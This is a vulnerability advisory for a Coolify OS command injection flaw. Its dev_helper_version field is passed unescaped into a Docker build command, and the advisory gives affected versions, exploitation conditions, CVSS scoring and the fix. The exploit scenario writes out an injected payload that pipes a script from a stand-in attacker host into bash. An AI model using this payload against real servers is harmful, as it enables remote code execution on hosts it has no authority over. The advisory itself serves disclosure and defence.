DescriptionCVE.org

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to 4.0.0-beta.474, the buildHelperImage method in app/Livewire/Settings/Index.php constructs a Docker build command using the dev_helper_version field without shell escaping, allowing an attacker who can set the helper version and trigger the helper image build in a development environment to execute arbitrary commands on the server. This issue is fixed in version 4.0.0-beta.474.

AnalysisAI

OS command injection in Coolify's settings module allows a highly privileged attacker in a development environment to execute arbitrary shell commands on the host server by injecting metacharacters into the dev_helper_version field, which is passed unsanitized into a Docker build command. All Coolify releases prior to 4.0.0-beta.474 are affected. …

Vulnerability AssessmentAI

Exploitation Four simultaneous conditions are required for exploitation: (1) The Coolify instance must be running in development mode, as the dev_helper_version field and buildHelperImage code path are specific to the development environment configuration - standard production deployments do not expose this path. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.8 Low score with vector AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L accurately captures the tightly constrained exploitation conditions. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An admin-level Coolify user operating in a development environment navigates to the Settings interface and modifies the dev_helper_version field to contain shell metacharacters - for example, appending '; curl http://attacker.example/shell.sh | bash' - then clicks the button to trigger a helper image build. The server-side buildHelperImage method concatenates this value directly into a Docker CLI command string, causing the injected shell payload to execute on the host with the permissions of the Coolify process. …
Remediation Upgrade Coolify to version 4.0.0-beta.474 or later, which resolves the injection by properly escaping the dev_helper_version field before use in the Docker build command. … Detailed patch versions, workarounds, and compensating controls in full report.
